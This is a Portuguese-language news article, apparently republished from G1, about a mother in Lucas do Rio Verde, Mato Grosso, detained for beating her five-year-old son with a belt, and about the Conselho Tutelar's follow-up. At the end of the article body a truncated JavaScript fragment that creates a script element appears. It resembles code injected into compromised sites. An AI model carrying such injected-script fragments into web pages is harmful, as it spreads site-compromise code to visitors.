Capa / Em Destaque / Mãe é detida por bater em filho com cinto em MT

Mãe é detida por bater em filho com cinto em MT

phpThumb_generated_thumbnailFonte: G1

Uma mulher foi detida na cidade de Lucas do Rio Verde, a 360 km de Cuiabá, por agredir o filho de cinco anos com uma cinto na sexta-feira (22). Em depoimento, a mulher disse que tentava corrigir o filho e teve um momento de descontrole. Segundo a Polícia Civil, a mãe foi conduzida à uma delegacia e assinou um Termo Circunstanciado de Ocorrência (TCO) por maus tratos. A mulher foi liberada porque está no nono mês de gestação e deve dar à luz a qualquer momento.

O Conselho Tutelar daquele município investiga a agressão. Segundo o conselheiro Cesar Rocha da Costa, a própria mãe levou o filho a uma unidade de saúde após as agressões. “As marcas no corpo da criança eram visíveis, por isso ela procurou ajuda”, disse. Ainda de acordo com o órgão, a mulher não tem histórico de agressão contra crianças.

A polícia e o Conselho Tutelar foram acionados pela médica que atendeu a criança. A mãe foi conduzida à uma delegacia e, em depoimento, relatou que o filho havia saído para rua e estava a desobedecendo. Na tentativa de corrigir o filho ela teria usado uma cinta.

A criança, segundo o Conselho Tutelar, está sob o cuidado de familiares e foi incluído em um grupo de apoio. À polícia, o menino confirmou que estava desobedecendo a mãe.var d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top